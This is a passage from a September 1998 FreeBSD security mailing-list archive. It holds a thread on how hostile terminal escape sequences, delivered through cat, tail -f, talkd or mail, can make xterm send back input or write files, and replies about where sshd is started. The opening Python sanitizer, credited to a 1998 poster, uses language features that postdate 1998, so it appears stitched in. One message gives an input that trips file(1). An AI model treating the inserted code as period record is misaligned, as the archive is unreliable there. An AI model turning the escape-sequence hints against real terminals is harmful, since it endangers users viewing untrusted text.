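        source = [SAMPLE_LOG]      # no pipe: demonstrate on the constructed sample
    else:
        source = sys.stdin.buffer  # iterates one line at a time, so tail -f feeds work
    for raw in source:
        hits = find_escapes(raw)
        if hits:
            print(f"warning: {len(hits)} escape byte(s) at offsets {hits}",
                  file=sys.stderr)
        sys.stdout.write(sanitize_for_terminal(raw))
        sys.stdout.flush()
```

The filter makes no attempt to let "harmless" sequences through: as Jamie's reply notes, separating cosmetic attribute changes from the sequences that make the terminal answer back is exactly the hard part, so when the data is untrusted everything non-printing is made visible instead. less(1) applies the same rule by default, which is why it was recommended earlier in the thread.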
- jared To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 15:27:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA13903 for freebsd-security-outgoing; Thu, 10 Sep 1998 15:27:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA13898 for ; Thu, 10 Sep 1998 15:27:38 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id PAA18493; Thu, 10 Sep 1998 15:24:48 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: rotel@indigo.ie cc: Studded , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 22:21:04 -0000." <199809102121.WAA01790@indigo.ie> Date: Thu, 10 Sep 1998 15:24:48 -0700 Message-ID: <18489.905466288@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > to this problem. The issue is that the terminal emulator doesn't > have an option to disable the features which are dangerous (which > should be disabled by default). This is a subtle attack which can I think most people have gotten used to that fact over the 15+ years where actual terminals which did this were no less dangerous. I sure did. Geeze, the kids these days - no perspective at all! :-) > Perhaps someone will now be prompted to make the necessary changes. :) Somehow, I doubt it. This is the kind of issue which people are willing to whine about but seldom act upon. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 15:29:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA14308 for freebsd-security-outgoing; Thu, 10 Sep 1998 15:29:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shamash3.shamash.org (shamash3.shamash.org [207.244.122.42]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id PAA14303 for ; Thu, 10 Sep 1998 15:29:44 -0700 (PDT) (envelope-from k@yt.to) Received: (qmail 6690 invoked by uid 65544); 10 Sep 1998 22:29:47 -0000 Mail-Followup-To: security@FreeBSD.ORG Message-ID: <19980910182947.B176@yt.to> Date: Thu, 10 Sep 1998 18:29:47 -0400 
From: Louis Theran To: security@FreeBSD.ORG Subject: Re: cat exploit References: <17574.905449550@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93i In-Reply-To: ; from Aleph One on Thu, Sep 10, 1998 at 03:01:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Sep 10, 1998 at 03:01:32PM -0500, Aleph One wrote: > > How about something more practical? Like being able to turn off this > "feature". cat -v ? ^L -- Louis Theran "Te occidere possunt, sed te edere non possunt nefas quo est." PGP welcome; key at: k-pgpkey@yt.to To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 15:31:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA14829 for freebsd-security-outgoing; Thu, 10 Sep 1998 15:31:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA14822 for ; Thu, 10 Sep 1998 15:31:22 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id PAA18852; Thu, 10 Sep 1998 15:26:55 -0700 (PDT) Message-Id: <3.0.5.32.19980910153036.00ce92a0@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 10 Sep 1998 15:30:36 -0700 To: Aleph One 
From: Jamie Lawrence
Subject: Re: cat exploit
Cc: security@FreeBSD.ORG
In-Reply-To:
References: <3.0.5.32.19980910144756.01d24c70@204.74.82.151>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[My last comment on the topic.]

>The problem may be as old as unix itself. Nonetheless, it hasn't been
>fixed. Fixing it in cat, by not using it or modifying it, is the wrong
>solution. Nor is this a root only problem. You and I may know not to use
>cat, but what about all your users? Nor is cat the only way to display
>files. The correct solution is to fix terminal emulators to ignore
>dangerous escape characters.

The fact of the matter is that this is defined behaviour. cat by default sends input to the terminal. The terminal processes certain input in certain ways. 'Fixing' terms would break an installed base of tools that use those escape characters. Perhaps processing escapes was a bad design idea - I certainly won't try to defend it from a security standpoint. But breaking a ton of tools to fix a different set is not a workable solution.

As far as "what about the users" goes, I know of no way to save them from all the ways they can shoot themselves in the foot, save disabling a majority of the supplied OS utilities.

I disagree that 'fixing' the terminals is the correct solution, even if they can be 'fixed' to provide the desired results without breaking compatibility (which I don't believe is possible, but then I haven't investigated it). From a security standpoint, it _might_ be, in some contexts.

I find it odd that this one is suddenly getting so much attention. Nature of mailing lists, I suppose.
-j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 16:10:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA21915 for freebsd-security-outgoing; Thu, 10 Sep 1998 16:10:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA21895 for ; Thu, 10 Sep 1998 16:10:10 -0700 (PDT) (envelope-from karl@Mars.mcs.net) Received: from Mars.mcs.net (karl@Mars.mcs.net [192.160.127.85]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id SAA03462; Thu, 10 Sep 1998 18:09:57 -0500 (CDT) Received: (from karl@localhost) by Mars.mcs.net (8.8.7/8.8.2) id SAA02966; Thu, 10 Sep 1998 18:09:57 -0500 (CDT) Message-ID: <19980910180956.A2858@mcs.net> Date: Thu, 10 Sep 1998 18:09:56 -0500 
From: Karl Denninger
To: andrew@squiz.co.nz, Studded
Cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: terminal escape exploit (was Re: cat exploit)
References: <35F818CA.8647A116@dal.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: ; from Andrew McNaughton on Fri, Sep 11, 1998 at 09:19:42AM +1200
Organization: Karl's Sushi and Packet Smashers
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Sep 11, 1998 at 09:19:42AM +1200, Andrew McNaughton wrote:
> On Thu, 10 Sep 1998, Studded wrote:
>
> > It seems to me that a lot of people missed the point of one of the
> > warnings that someone else posted in response actually. Don't use cat
> > routinely to view files. Use more, or better yet less since less doesn't
> > view binary files by default.
>
> It's not just cat that you've got to worry about. tail is another one.
> How many people routinely use 'tail -f' to monitor log info that includes
> potentially tainted content.
>
> The problem is not cat. It's xterm and other similar terminal programs.
>
> Andrew

The problem is TERMINALS.

You can't bitch that an EMULATOR does exactly what it is claimed to do - emulate the REAL DEVICE.

This "exploit" is so old it's crusty; it is quite possible to do this on a VT-52 (yes, a real VT-52, you know those terminals that weighed about 100 lbs, had a dinky little screen, were made by DEC and haven't been seen in some 15 years? Yes, those.)
-- -- Karl Denninger (karl@denninger.net) Voice: 312-803-6271 x219 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 16:28:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA25388 for freebsd-security-outgoing; Thu, 10 Sep 1998 16:28:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-05.igrin.co.nz [202.49.245.84]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA25379 for ; Thu, 10 Sep 1998 16:28:14 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id LAA06172 for ; Fri, 11 Sep 1998 11:28:01 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 11:28:01 +1200 (NZST) 
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: security@FreeBSD.ORG
Subject: Re: terminal escape exploit (was Re: cat exploit)
In-Reply-To: <19980910180956.A2858@mcs.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Karl Denninger wrote:

> The problem is TERMINALS.
>
> You can't bitch that an EMULATOR does exactly what it is claimed to do -
> emulate the REAL DEVICE.
>
> This "exploit" is so old its crusty; it is quite possible to do this on a
> VT-52 (yes, a real Vt-52, you know those terminals that weighed about 100
> lbs, had a dinky little screen, were made by DEC and haven't been seen in
> some 15 years? Yes, those.)

Ok, so the origins are old. It's not an old problem in the sense that it's with us now and still needs fixing. I presume if it hasn't been then there's enough software that uses this 'feature' that it's awkward to throw it out. Could someone explain why this functionality is needed?

Andrew

From owner-freebsd-security Thu Sep 10 17:33:17 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA06252 for freebsd-security-outgoing; Thu, 10 Sep 1998 17:33:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hyperreal.org (taz.hyperreal.org [209.133.83.16]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id RAA06243 for ; Thu, 10 Sep 1998 17:33:16 -0700 (PDT) (envelope-from brian@hyperreal.org)
Received: (qmail 3456 invoked by uid 24); 11 Sep 1998 00:33:06 -0000
Message-ID: <19980911003306.3455.qmail@hyperreal.org>
X-Sender: brian@hyperreal.org
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.1
Date: Thu, 10 Sep 1998 17:33:41 -0700
To: andrew@squiz.co.nz
From: Brian Behlendorf
Subject: Re: terminal escape exploit (was Re: cat exploit)
Cc: security@FreeBSD.ORG
References: <35F818CA.8647A116@dal.net>

At 09:19 AM 9/11/98 +1200, Andrew McNaughton wrote:
>On Thu, 10 Sep 1998, Studded wrote:
>
>> It seems to me that a lot of people missed the point of one of the
>> warnings that someone else posted in response actually. Don't use cat
>> routinely to view files. Use more, or better yet less since less doesn't
>> view binary files by default.
>
>It's not just cat that you've got to worry about. tail is another one.
>How many people routinely use 'tail -f' to monitor log info that includes
>potentially tainted content.

Yeah, especially when trying to debug a problem that requires root. I do
this.

>The problem is not cat. It's xterm and other similar terminal programs.

I agree. Even if the old-timers around here are saying "it's always been
like that, just don't do it and it'll be all OK", I still see this as a
design flaw, and would like to believe that "running arbitrary commands"
can be prevented without preventing all the legitimate uses for escape
sequences.

Brian

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
"Common sense is the collection of prejudices | brian@apache.org
 acquired by the age of eighteen."
                                   - Einstein | brian@hyperreal.org

From owner-freebsd-security Thu Sep 10 18:21:32 1998
Message-Id: <199809110121.CAA04444@thuvia.demon.co.uk>
From: mark@thuvia.demon.co.uk (Mark Valentine)
Date: Fri, 11 Sep 1998 02:21:41 +0100
In-Reply-To: Jared Mauch's message of Sep 10, 5:19pm
To: security@FreeBSD.ORG
Subject: Re: cat exploit
> From: Jared Mauch
> Date: Thu 10 Sep, 1998
> Subject: Re: cat exploit

> What you really need to do is using a modern file(1), or
> more specifically file with a modern magic(5) file, you can determine
> the best way to view it.

file(1) isn't safe, e.g. try it on a file which starts:

#! ^E

(Replace ^E with a real control char.)

Mark.

--
Mark Valentine at Home                    http://www.thuvia.org/mark/
"I'll be mellow when I'm DEAD."
Mark Valentine uses and endorses FreeBSD  http://www.freebsd.org/

From owner-freebsd-security Thu Sep 10 18:29:27 1998
Date: Thu, 10 Sep 1998 19:25:46 -0600
Message-Id: <199809110125.TAA02455@mt.sri.com>
From: Nate Williams
To: Aleph One
Cc: "Jordan K. Hubbard", Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
References: <18171.905461424@time.cdrom.com>

> Because it's non-intuitive. How many end users are going to know that
> simply cat'ing a file is dangerous?

End users shouldn't be catting other people's files, and certainly anyone
running as root should know better. If you're stupid, nothing will stop
you from hurting yourself.

Nate

From owner-freebsd-security Thu Sep 10 18:48:50 1998
Message-Id: <199809110148.SAA18718@hub.freebsd.org>
To: Brian Behlendorf
cc: andrew@squiz.co.nz, security@FreeBSD.ORG
Subject: Re: terminal escape exploit (was Re: cat exploit)
In-reply-to: Your message of "Thu, 10 Sep 1998 17:33:41 PDT." <19980911003306.3455.qmail@hyperreal.org>
Date: Thu, 10 Sep 1998 20:52:53 -0500
From: Jon Hamilton

In message <19980911003306.3455.qmail@hyperreal.org>, Brian Behlendorf wrote:
} At 09:19 AM 9/11/98 +1200, Andrew McNaughton wrote:
} >On Thu, 10 Sep 1998, Studded wrote:
} >
} >> It seems to me that a lot of people missed the point of one of the
} >> warnings that someone else posted in response actually. Don't use cat
} >> routinely to view files. Use more, or better yet less since less doesn't
} >> view binary files by default.
} >
} >It's not just cat that you've got to worry about. tail is another one.
} >How many people routinely use 'tail -f' to monitor log info that includes
} >potentially tainted content.
}
} Yeah, especially when trying to debug a problem that requires root. I do
} this.
}
} >The problem is not cat. It's xterm and other similar terminal programs.
}
} I agree. Even if the old-timers around here are saying "it's always been
} like that, just don't do it and it'll be all OK", I still see this as a
} design flaw, and would like to believe that "running arbitrary commands"
} can be prevented without preventing all the legitimate uses for escape
} sequences.

One legitimate (if questionable) use _is_ to run arbitrary commands (well,
to output arbitrary text, the rest is all downhill from there).
Is it a good idea? Depends. Could someone who was sick enough to be
doing that do it another way? Almost certainly. But you can't change
the functionality without affecting _something_ someone is doing _somewhere_.
The question is whether the loss of functionality is outweighed by the gains.
People's opinions as to the answer to that question are, um, not unanimous,
as you see.

As has been suggested, the thing to do would be for someone who cares
to patch xterm (and rxvt, and anything else that does emulation of
virtually any intelligent terminal ever built) to permit a compile- (or,
better yet, run-time) option to turn off this feature.
Submit the patch to the maintainers of the code in question and argue
with them about it if necessary.

--
Jon Hamilton
hamilton@pobox.com

From owner-freebsd-security Thu Sep 10 19:33:44 1998
To: Aleph One
cc: security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: cat exploit
In-reply-to: Your message of "Thu, 10 Sep 1998 16:24:28 CDT."
Date: Thu, 10 Sep 1998 22:33:26 -0400
Message-ID: <17280.905481206@gjp.erols.com>

Aleph One wrote in message ID :
> Because it's non-intuitive. How many end users are going to know that
> simply cat'ing a file is dangerous? More or less shouldn't protect me.
> xterm and rxvt should.

Then why are you asking us to stop it? We do not maintain either xterm
nor rxvt in the FreeBSD source tree. May I suggest you contact the
maintainers of the respective code bases and complain?

Gary
--
Gary Palmer                                          FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Thu Sep 10 20:00:38 1998
Date: Thu, 10 Sep 1998 23:00:04 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Jon Hamilton
cc: Brian Behlendorf, andrew@squiz.co.nz, security@FreeBSD.ORG
Subject: Re: terminal escape exploit (was Re: cat exploit)
In-Reply-To: <199809110148.SAA18718@hub.freebsd.org>

One will in fact even notice that most UNIX programs that pass text to
other users' terminals (write, etc.) filter out control characters
specifically to prevent this behavior. For a while there was a fad among
high schoolers (don't know about college students -- wasn't one at the
time) where escape characters could be stuffed into the announcement name
presented by talkd when a talk username was performed. It would set the
alternate font for vt-style terminals. Needless to say, a hard reset in
xterm fixed it, and then safety routines were added to clean up the
output there also.

No doubt people can get around this via DNS -- there are no doubt ways to
pass arbitrary text to the terminal of the user by stuffing it in DNS
names that get handed to the user. It may also be possible to pass text
via syslog and so on.

One cool trick if you have write access to the user's terminal device is
to use the Tek control codes under Xterm to pop up a Tek display and
perform cool graphics tricks. Draw a picture of a tree and have an arrow
point at the roots or something.

One extremely useful feature in Xterm is the mouse interaction -- program
sends escape code, and xterm switches to sending stuff back to the
terminal device when a mouse is clicked. This is how Pine does this (and
other programs). If we disable escape codes, we do lose some useful
behavior. On the other hand, for anyone still using serial terminals,
this behavior cannot be disabled at all I would guess.
Adding a new menu item in Xterm, a command line flag, and an Xresource
that allowed users to disable this behavior might be useful, but I think
turning it off loses too much functionality (especially given that it is
not clear that the threat is actually a threat).

Robert

On Thu, 10 Sep 1998, Jon Hamilton wrote:

>
> In message <19980911003306.3455.qmail@hyperreal.org>, Brian Behlendorf wrote:
> } At 09:19 AM 9/11/98 +1200, Andrew McNaughton wrote:
> } >On Thu, 10 Sep 1998, Studded wrote:
> } >
> } >> It seems to me that a lot of people missed the point of one of the
> } >> warnings that someone else posted in response actually. Don't use cat
> } >> routinely to view files. Use more, or better yet less since less doesn't
> } >> view binary files by default.
> } >
> } >It's not just cat that you've got to worry about. tail is another one.
> } >How many people routinely use 'tail -f' to monitor log info that includes
> } >potentially tainted content.
> }
> } Yeah, especially when trying to debug a problem that requires root. I do
> } this.
> }
> } >The problem is not cat. It's xterm and other similar terminal programs.
> }
> } I agree. Even if the old-timers around here are saying "it's always been
> } like that, just don't do it and it'll be all OK", I still see this as a
> } design flaw, and would like to believe that "running arbitrary commands"
> } can be prevented without preventing all the legitimate uses for escape
> } sequences.
>
> One legitimate (if questionable) use _is_ to run arbitrary commands (well,
> to output arbitrary text, the rest is all downhill from there).
> Is it a good idea? Depends. Could someone who was sick enough to be
> doing that do it another way? Almost certainly. But you can't change
> the functionality without affecting _something_ someone is doing _somewhere_.
> The question is whether the loss of functionality is outweighed by the gains.
> People's opinions as to the answer to that question are, um, not unanimous,
> as you see.
>
> As has been suggested, the thing to do would be for someone who cares
> to patch xterm (and rxvt, and anything else that does emulation of
> virtually any intelligent terminal ever built) to permit a compile- (or,
> better yet, run-time) option to turn off this feature. Submit the
> patch to the maintainers of the code in question and argue with them
> about it if necessary.
>
> --
> Jon Hamilton
> hamilton@pobox.com
>

Robert N Watson
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/
robert@fledge.watson.org              http://www.watson.org/~robert/

From owner-freebsd-security Thu Sep 10 22:26:30 1998
Date: Fri, 11 Sep 1998 01:26:11 -0400 (EDT)
From: Snob Art Genre
Reply-To: ben@rosengart.com
To: Jamie Lawrence
cc: Aleph One, security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <3.0.5.32.19980910144756.01d24c70@204.74.82.151>

On Thu, 10 Sep 1998, Jamie Lawrence wrote:

> At 03:01 PM 9/10/98 -0500, Aleph One wrote:
>
> >How about something more practical? Like being able to turn off this
> >"feature".
>
> "rm /bin/cat"

Cat has little to do with the issue under discussion, despite the
subject line. Escape sequences can come from talk requests, naive
write(1)-like programs or naive network clients (I have seen the first
two, and the third is likely).

Unless I missed it, nobody has defended the xterm feature in question on
any basis except that that's how it's always been done. I also didn't
notice any reports of recent exploits.

I'd like to hear a wider variety of opinions on the matter -- in
particular, I wonder if anyone still uses the feature for anything, and
if it's been exploited. I don't understand why you're so dismissive
about it.

Ben

"You have your mind on computers, it seems."
From owner-freebsd-security Thu Sep 10 23:05:29 1998
Message-ID: <35F8BF78.4C32DBEF@rezidew.net>
Date: Fri, 11 Sep 1998 01:13:12 -0500
From: Graphic Rezidew
Organization: rezidew.net
To: freebsd-security@FreeBSD.ORG
Subject: sshd

ok, now I am just a little bit concerned about this (maybe I'm
overlooking something that's REALLY obvious). I installed the ssh port
from 2.2.5. I had set up tcp wrappers and noticed that none of the rules
for ssh were working, so I took the line for it out of /etc/inetd.conf.
The next day I noticed that a 'netstat -a' revealed that sshd was running
on port 22 of my machine. I have done "grep ssh /etc/*" and come back
with only the entry in /etc/services and the rules in /etc/hosts.deny and
/etc/hosts.allow. I manually went through /etc/rc.local and found no
entry for anything called *ssh*. Until I can get this figured out I have
decided to 'chmod 000 /usr/local/sbin/sshd'. Any help in locating the
rogue execution of sshd would be greatly appreciated.

--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rules for driving in New York:
(1) Anything done while honking your horn is legal.
(2) You may park anywhere if you turn your four-way flashers on.
(3) A red light means the next six cars may go through the intersection.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Graphic Rezidew    Graphic@rezidew.net    http://Graphic.Rezidew.net

From owner-freebsd-security Thu Sep 10 23:07:52 1998
From: proff@iq.org
Message-ID: <19980911060722.18124.qmail@iq.org>
Subject: Re: cat exploit
In-Reply-To: from Snob Art Genre at "Sep 11, 98 01:26:11 am"
To: ben@rosengart.com
Date: Fri, 11 Sep 1998 16:07:22 +1000 (EST)
Cc: bugtraq@netspace.com

> On Thu, 10 Sep 1998, Jamie Lawrence wrote:
>
> > At 03:01 PM 9/10/98 -0500, Aleph One wrote:
> >
> > >How about something more practical? Like being able to turn off this
> > >"feature".
> >
> > "rm /bin/cat"
>
> Cat has little to do with the issue under discussion, despite the
> subject line. Escape sequences can come from talk requests, naive
> write(1)-like programs or naive network clients (I have seen the first
> two, and the third is likely).
>
> Unless I missed it, nobody has defended the xterm feature in question on
> any basis except that that's how it's always been done. I also didn't
> notice any reports of recent exploits.
>
> I'd like to hear a wider variety of opinions on the matter -- in
> particular, I wonder if anyone still uses the feature for anything, and
> if it's been exploited. I don't understand why you're so dismissive
> about it.
>
>
> Ben

It's amusing to see this come up again. Several years ago I discovered
various amusing tricks one can do with xterm escape sequences (as opposed
to vt52/esprit etc., which is what everyone else is really yammering on
about, but which actually has little to no relevance to xterms -- at least
in terms of how one goes about exploiting the dang things). The
`xtermxtermxterm' people are seeing after catting binary files is merely
a response to ASCII enq (enquire) (^e). It is harmless and simply prompts
the terminal to send back its terminal type (in this case `xterm'). STOP
WORRYING ABOUT IT.
However, using combinations of other escape codes, one can cause xterms
(particularly X consortium derived xterms) to do everything from sending
back semi-arbitrary bytes (I say `semi-arbitrary', because I wasn't able
to find a way of storing all byte sequences - control codes and a few
other characters are not in the running) to writing arbitrary files. Yes,
you read that right. talkd(8), elm(1), and mail(1) together with an xterm
are your friends (well, someone's friends).

Cheers,
Julian.

From owner-freebsd-security Thu Sep 10 23:36:55 1998
Date: Thu, 10 Sep 1998 23:35:13 -0700 (PDT)
From: Marc Slemko
To: Graphic Rezidew
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net>

On Fri, 11 Sep 1998, Graphic Rezidew wrote:

> ok, now I am just a little bit concerned about this ( maybe I'm over
> looking something
> that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set
> up tcp wrappers
> and noticed that none of the rules for ssh were working so I took the
> line for it out
> of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed

ssh isn't started from inetd.conf. The port can be compiled with libwrap
support, however, if you compile it properly.

> that sshd was
> running on port 22 of my machine. I have done "grep ssh /etc/*" and come
> back with only
> the entry in /etc/services and the rules in /etc/hosts.deny and
> /etc/hosts.allow. I
> manually went through the /etc/rc.local and found no entry for anything
> called *ssh*.

/usr/local/etc/rc.d/

From owner-freebsd-security Fri Sep 11 00:00:19 1998
Date: Fri, 11 Sep 1998 18:59:07 +1200 (NZST)
From: Andrew McNaughton
Reply-To: andrew@squiz.co.nz
To: Graphic Rezidew
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net>

On Fri, 11 Sep 1998, Graphic Rezidew wrote:

> ok, now I am just a little bit concerned about this ( maybe I'm over
> looking something
> that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set
> up tcp wrappers
> and noticed that none of the rules for ssh were working so I took the
> line for it out
> of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed
> that sshd was
> running on port 22 of my machine. I have done "grep ssh /etc/*" and come
> back with only
> the entry in /etc/services and the rules in /etc/hosts.deny and
> /etc/hosts.allow. I
> manually went through the /etc/rc.local and found no entry for anything
> called *ssh*.

By default sshd is run from /usr/local/etc/rc.d/sshd.sh.

Andrew

From owner-freebsd-security Fri Sep 11 00:12:29 1998
Date: Fri, 11 Sep 1998 09:12:13 +0200 (SAST)
From: Matthew West
To: Graphic Rezidew
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net>

On Fri, 11 Sep 1998, Graphic Rezidew wrote:

> looking something that's REALLY obvious) . I installed the ssh port from
> 2.2.5 I had set up tcp wrappers and noticed that none of the rules for
> ssh were working so I took the line for it out of /etc/inetd.conf. The

sshd runs as a stand-alone daemon; it is not called from inetd, so you
won't find an entry for it in /etc/inetd.conf. As it's a port, there'll
be an "sshd.sh" startup file in /usr/local/etc/rc.d, and its
configuration files will be in /usr/local/etc (not /etc). You'll probably
want to look at the "AllowHosts" and "DenyHosts" keywords in sshd_config.

--mwest@cs.uct.ac.za
http://www.cs.uct.ac.za

From owner-freebsd-security Fri Sep 11 00:30:58 1998
To: Graphic Rezidew
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-reply-to: Your message of "Fri, 11 Sep 1998 01:13:12 CDT." <35F8BF78.4C32DBEF@rezidew.net>
Date: Fri, 11 Sep 1998 00:30:48 -0700
Message-ID: <20262.905499048@time.cdrom.com>
From: "Jordan K. Hubbard"

> ok, now I am just a little bit concerned about this ( maybe I'm over
> looking something
> that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set

You are, don't worry. :)

> up tcp wrappers
> and noticed that none of the rules for ssh were working so I took the

Because you have your files in the wrong place - if you read the man page
for tcpd, you'll see that the permission files live in
/usr/local/etc/hosts.*

> line for it out
> of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed
> that sshd was
> running on port 22 of my machine. I have done "grep ssh /etc/*" and come

Which isn't started from inetd.conf. It's started from
/usr/local/etc/rc.d/ when the system boots; nothing rogue about it.

- Jordan

From owner-freebsd-security Fri Sep 11 00:34:24 1998
Date: Fri, 11 Sep 1998 17:33:58 +1000 (EST)
From: Nicholas Charles Brawn
To: Graphic Rezidew
cc: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net>

If you installed the package or port, then there will be a startup script
for it, located in /usr/local/etc/rc.d/ssh.sh or similar.

Nick

--
Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick
Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
"When in doubt, ask someone wiser than yourself..." -unknown

From owner-freebsd-security Fri Sep 11 00:41:29 1998
Message-ID: <35F8D3D9.9D04E937@urc.ac.ru>
Date: Fri, 11 Sep 1998 13:40:09 +0600
From: Anton Voronin
Organization: URC FREEnet
X-Mailer: Mozilla 4.5b1 [ru] (X11; I; FreeBSD 2.2.5-STABLE i386)
X-Accept-Language: ru
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: Re: sshd
References:
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Marc Slemko wrote:

> ssh isn't started from inetd.conf.
>

However, it can be, and it is advised somewhere in its manual for the case
where ssh connections are expected to be rare enough.

--
Anton Voronin              | Ural Regional Center of FREEnet,
                           | Southern Ural University, Chelyabinsk, Russia
http://www.urc.ac.ru/~anton | Programmer & System Administrator

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 01:10:00 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA00517 for freebsd-security-outgoing; Fri, 11 Sep 1998 01:10:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA00509 for ; Fri, 11 Sep 1998 01:09:57 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk)
